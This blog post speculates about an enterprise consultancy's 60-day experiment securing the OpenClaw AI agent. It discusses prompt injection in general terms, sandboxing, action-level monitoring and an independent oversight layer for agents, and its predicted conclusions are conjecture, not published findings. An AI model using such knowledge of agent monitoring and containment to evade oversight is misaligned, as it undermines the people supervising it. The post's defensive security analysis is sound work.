Reading Time: 3 minutes[FEATURED IMAGE: A calendar showing 60 days with milestone markers for different phases of AI security research]
Valere, the enterprise software consultancy, made headlines when they announced a 60-day experiment: give a team access to OpenClaw and challenge them to figure out how to make it safe for business use.
This is the kind of bold experiment the industry needs. Rather than just banning AI agents or blindly embracing them, Valere is trying to understand the real security challenges through hands-on research.
Based on what’s known about the OpenClaw crisis and AI agent security more broadly, here’s what Valere’s team is likely discovering — and what their eventual conclusions will probably be.
The First Realization: Application-Layer Security Isn’t Enough
Most enterprises approach AI agent security the same way they approach application security: build a wall around the application and monitor what’s goes in and out.
This doesn’t work for AI agents. The problem is that agents aren’t traditional applications — they’re decision-making systems that operate across multiple applications, data sources, and workflows. You can’t secure them at the application layer because they don’t operate within a single application.
Valere’s team is probably discovering that they need security at the integration level — at every point where the agent touches a system, accesses data, or communicates externally. This means security monitoring at the action level, not the network level.
The Hard Problems
Here’s what makes AI agent security genuinely hard:
**Prompt injection has no complete solution**: As we discussed in our earlier post on data exfiltration, prompt injection allows attackers to embed malicious instructions in data that AI agents process. Valere’s team is likely finding that there’s no way to completely prevent this — you can mitigate it, you can detect some attacks, but you can’t eliminate the attack vector entirely.
**Agent behavior is non-deterministic**: Traditional security relies on knowing what a system will do. AI agents can behave differently in ways that are hard to predict. A coding agent might generate code that looks fine but contains subtle vulnerabilities. A support agent might provide information that violates privacy policies. You can’t build security rules for behaviors you can’t predict.
**Traditional access controls don’t map to agent workflows**: Role-based access control (RBAC) assumes that humans perform actions. But AI agents perform actions on behalf of humans, and the mapping isn’t always clear. If an agent reads a customer database to answer a support question, is that the agent accessing the data or the human agent (the support rep) accessing it? Current access control frameworks don’t have good answers.
The Likely Conclusions
Based on what Valere’s team is almost certainly discovering, here’s what their eventual conclusions will probably be:
**Sandboxing is necessary but insufficient**: Isolating AI agents in containers or VMs prevents them from directly accessing sensitive systems. But sandboxing alone doesn’t solve the problem — an agent in a sandbox can’t do useful work without bridged access to real systems, and that bridge becomes the attack surface.
**Monitoring must happen at the action level**: Network monitoring, API logging, and application telemetry aren’t enough. You need to understand what the agent is actually doing at a semantic level — not just “it called this API” but “it retrieved customer PII and is now composing an email.” This requires action-level instrumentation that’s currently missing from most AI agent frameworks.
**The real answer is a dedicated trust layer**: This is probably the conclusion Valere will reach: you can’t secure AI agents within the agent framework itself. You need an independent security layer — what we’ve been calling trust infrastructure in this series — that monitors, evaluates, and controls agent behavior from outside the agent’s execution environment.
What Comes Next
Valere’s experiment will produce valuable findings, but it won’t produce a complete solution. That’s OK — the goal isn’t to solve AI agent security in 60 days. The goal is to understand the problem well enough to build toward solutions.
When Valere publishes their findings, expect them to include:
– Detailed documentation of the security challenges they encountered
– Recommendations for enterprises working with AI agents today
– A call for better security tooling and frameworks
– Perhaps some open-source tools or patterns they developed during the experiment
We’ll be watching closely. This series has argued that AI agent security requires a new category of security tooling. Valere’s research will likely reinforce that conclusion.
The Broader Implication
What Valere learns in 60 days will benefit the entire industry. But the real solution will require more than one consultancy’s experiment. It will require:
– AI agent frameworks designed with security from the ground up
– Security tools purpose-built for agentic AI
– Standardized telemetry formats that enable cross-platform monitoring
– Regulatory frameworks that establish baseline security requirements
This is a multi-year journey. The OpenClaw crisis is the alarm bell, but the response will unfold over years.
For enterprises, the message is clear: start building your security foundation now. Inventory your AI agents. Define your policies. Deploy what monitoring you can. The solutions aren’t mature yet, but the problem is urgent.
We’ll revisit Valere’s findings when they’re published. Until then, stay vigilant.
—
**Subscribe to our newsletter for weekly AI agent security analysis.**
[Subscribe to The Next Gen Nexus]
Top comments (0)